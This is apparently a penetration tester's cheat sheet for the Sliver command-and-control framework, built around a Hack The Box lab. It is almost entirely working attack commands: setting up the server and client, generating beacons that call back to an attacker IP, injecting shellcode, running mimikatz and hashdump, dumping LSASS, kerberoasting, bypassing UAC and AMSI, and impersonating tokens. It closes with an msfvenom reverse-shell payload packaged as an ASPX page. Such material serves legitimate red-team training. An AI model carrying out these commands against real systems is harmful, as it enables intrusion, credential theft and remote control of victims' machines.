Sliver

Installation

Server Setup

Sliver's Server component has the important role of serving as the location implants will communicate back to.

Sliver's Client component has the role of being the location the user will execute the commands and tools needed to fulfill their objectives.

A downside of not having a server and a client is that everything runs inside the process of Sliver, meaning that if you accidentally terminate the process, you might lose the beacons or sessions.

Intrusionz3r0@htb[/htb]$ wget -q https://github.com/BishopFox/sliver/releases/download/vx.x.xx/sliver-server_linux
Intrusionz3r0@htb[/htb]$ chmod +x ./sliver-server_linux
Intrusionz3r0@htb[/htb]$ sudo apt install mingw-w64

Client Setup

Intrusionz3r0@htb[/htb]$ wget -q https://github.com/BishopFox/sliver/releases/download/v1.5.42/sliver-client_linux
Intrusionz3r0@htb[/htb]$ chmod +x ./sliver-client_linux
Intrusionz3r0@htb[/htb]$ ./sliver-client_linux import Intrusionz3r0_10.10.14.5.cfg 
2023/09/27 11:45:03 Saved new client config to: /home/user/.sliver-client/configs/user_ipaddress.cfg
Intrusionz3r0@htb[/htb]$ ./sliver-client_linux 

Operator profile

Sliver can differentiate who can connect based on the generated profile from its server.

[server] sliver > new-operator -n Intrusionz3r0 -l 10.10.14.5

[*] Generating new client certificate, please wait ... 
[*] Saved new client config to: /opt/silver/Intrusionz3r0_10.10.14.5.cfg 

Multiplayer mode

Sliver can host multiple operators simultaneously in a mode known as multiplayer.

[server] sliver > multiplayer

Armory

sliver > armory install seatbelt
sliver > armory install <tool-name>
sliver > armory install all

Install external tools

Example 1: UAC-BOF-Bonanza

Intrusionz3r0@htb[/htb]$ git clone https://github.com/icyguider/UAC-BOF-Bonanza.git
Intrusionz3r0@htb[/htb]$ cp -rp PATH/UACBypasses/MODULE ~/.sliver-client/extensions/
Intrusionz3r0@htb[/htb]$ cd ~/.sliver-client/extensions/MODULE/; make

#Load modules from Sliver
sliver > extensions load ~/.sliver-client/extensions/MODULE

Example 2: Chisel

Intrusionz3r0@htb[/htb]$ git clone https://github.com/MrAle98/chisel
Intrusionz3r0@htb[/htb]$ cd chisel/
Intrusionz3r0@htb[/htb]$ mkdir ~/.sliver-client/extensions/chisel
Intrusionz3r0@htb[/htb]$ cp extension.json ~/.sliver-client/extensions/chisel
Intrusionz3r0@htb[/htb]$ make windowsdll_64
Intrusionz3r0@htb[/htb]$ make windowsdll_32
Intrusionz3r0@htb[/htb]$ cp chisel.x64.dll ~/.sliver-client/extensions/chisel/
Intrusionz3r0@htb[/htb]$ cp chisel.x86.dll ~/.sliver-client/extensions/chisel/

Generate Beacons

sliver > generate beacon --http <your_server_ip>:<PORT> --os linux --arch x86 --format elf --seconds 5 --jitter 3 
sliver > generate beacon --mtls <your_server_ip> --os windows --arch amd64 --format exe --save /var/www/html
sliver > generate beacon --http 10.10.14.62:9002 --skip-symbols -N http-beacon

• --jitter introduces randomness to callback times.

• --seconds sets callback interval.

• --skip-symbols disables obfuscation (less stealthy).

One of the main disadvantages of skipping the symbol obfuscation is that the beacon will be easily detectable as Sliver due to the imports being presented in plaintext.

Listeners

sliver > http --lport 8088
sliver > http --lhost 10.10.14.62 --lport 9002
sliver > http 
sliver > mtls 

Useful commands

Execute commands

sliver (puppet-mtls) > execte -q cmd '/c <COMMAND>'
sliver (puppet-mtls) > execute -o powershell <PSCOMMAND>
sliver (puppet-mtls) > sharpsh -- '-e -c <BASE64-PowershellCommand>'
sliver (puppet-mtls) > execute-assembly /home/user/Rubeus.exe
sliver (puppet-mtls) > inline-execute-assembly /home/user/Rubeus.exe 'kerberoast /format:hashcat /user:alice /nowrap'

execute command as it will open a command prompt or the tool's GUI.

Memory Injection & Shellcode

#Inject shellcode into a new process
sliver (puppet-mtls) > execute-assembly /home/Intrusionz3r0/Documents/tools/Rubeus.exe createnetonly /program:C:\\windows\\system32\\notepad.exe
sliver (puppet-mtls) > execute-shellcode -p <pid> /home/Intrusionz3r0/Documents/tools/godpotato.bin #Created by donut

#Evade Defense loading an executing DLL in a remote process 
sideload /path/mimikatz.exe "token::elevate privilege::debug sekurlsa::logonpasswords exit"

Privilege escalation

#From Administrator to NT Authority System
sliver (TOTAL_NATIONAL) > getsystem

Credentials Attacks

#DUMP SAM Database
sliver (TOTAL_NATIONAL) > hashdump

#Dump LSA secrets
sliver (TOTAL_NATIONAL) > ps -e lsass
sliver (TOTAL_NATIONAL) > procdump --pid 524 --save /tmp/lsass.dmp

#Dump DPAPI creds
sliver (puppet-mtls) > sharpdpapi machinecredentials

Domain Enumeration

#Domain Enumeration 
sliver (puppet-mtls) > sharp-hound-4 -s -t 300 -- -c all --zipfilename filename #(Compatible: bloodhound-convert or bloodhound-community)
sliver (puppet-mtls) > sharpview -- <POWEVIEW-COMMAND>
sliver (puppet-mtls) > sharpsh -t 300 -- '-u C:\\temp\\script.ps1 -c Invoke-Method'
sliver (puppet-mtls) > sharpsh -t 300 -- '-u PATH/PowerView.ps1 -e -c <BASe64>' #use base64 command on linux
sliver (http-beacon) > c2tc-domaininfo 

Lateral Movement

#Impersonation
sliver (http-beacon) > make-token -u svc_sql  -p jkhnrjk123! -d dc.domain.local
sliver (puppet-mtls) > ps
sliver (puppet-mtls) > migrate -p 3908

Logon Type	Value	Description	Typical Use Case
LOGON_INTERACTIVE	2	Full login session as if from keyboard input.	Run processes locally as a normal user; full access.
LOGON_NETWORK	3	For accessing network resources; no full session created.	Access remote shares (e.g. \\server\share), no process execution.
LOGON_BATCH	4	Used by scheduled tasks or batch jobs.	Run automated tasks with minimal interaction.
LOGON_SERVICE	5	Used by services running under a user account.	Run persistent background services.
LOGON_UNLOCK	7	Triggered when a user unlocks the workstation.	Not typically used in token impersonation.
LOGON_NETWORK_CLEARTEXT	8	Like network logon, but with plaintext password.	Remote authentication requiring cleartext password.
LOGON_NEW_CREDENTIALS	9	Credentials used only for outbound connections; local identity unchanged.	runas /netonly scenarios; access network as another user.

Kerberos

#Kerberoast
sliver (http-beacon) > inline-execute-assembly /path/Rubeus.exe 'kerberoast /format:hashcat /user:alice /nowrap'
sliver (http-beacon) > c2tc-kerberoast roast alice
sliver (http-beacon) > bof-roast rdp/web01.child.htb.local

#Delegation
sliver (http-beacon) > delegationbof 6 dc.domain.local

ADSC

#ADCS
sliver (http-beacon) > certify -- find 
sliver (puppet-mtls) > sa-adcs-enum

Windows Enumeration

#Windows Enumeration
sliver (puppet-mtls) > sa-sc-enum #Enum windows services
sliver (puppet-mtls) > sa-netshares #Enum network shares SMB
sliver (puppet-mtls) > sa-cacls #Enum permissions
sliver (puppet-mtls) > sa-probe 10.10.235.135 22 #Check Open ports

AMSI Bypass

#Bypass AMSI
sliver (puppet-mtls) > SspiUacBypass 'C:\ProgramData\Puppet\puppet-update.exe'

Miscellaneous

Execute an unmanaged powershell

Project: UnmanagedPowerShell

 ~/Documents/Tools/donut/donut -a 2 -i UnmanagedPowerShell.exe -o UnmanagedPowerShell.bin

  [ Donut shellcode generator v1 (built Apr 30 2025 19:45:41)
  [ Copyright (c) 2019-2021 TheWover, Odzhan

  [ Instance type : Embedded
  [ Module file   : "UnmanagedPowerShell.exe"
  [ Entropy       : Random names + Encryption
  [ File type     : EXE
  [ Target CPU    : amd64
  [ AMSI/WDLP/ETW : continue
  [ PE Headers    : overwrite
  [ Shellcode     : "UnmanagedPowerShell.bin"
  [ Exit          : Thread

sliver (COMBINED_AGLET) > execute-shellcode -i /home/Intrusionz3r0/Documents/Tools/UnmanagedPowerShell.bin

[*] Started remote shell with pid 1888

PS > New-ADIDNSNode -Tombstone -Verbose -Node WIN-Y5CPSL66T45 -DATA 10.8.5.48

Create a shellcode with MSFVenom and Silver

We need to create a profile, a stage-listener, a stager and generate a payload through msfvenom.

Sliver > profiles new --http 10.10.14.5:8088 --format shellcode z3r0
sliver > stage-listener --url tcp://10.10.14.5:4443 --profile z3r0
sliver > http -L 10.10.14.5 -l 8088
sliver > generate stager --lhost 10.10.14.5 --lport 4443 --format csharp --save staged.txt

#Lastly create the payload and replace the staged.txt on the sliver.aspx.
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.14.5 LPORT=4443 -f aspx > sliver.aspx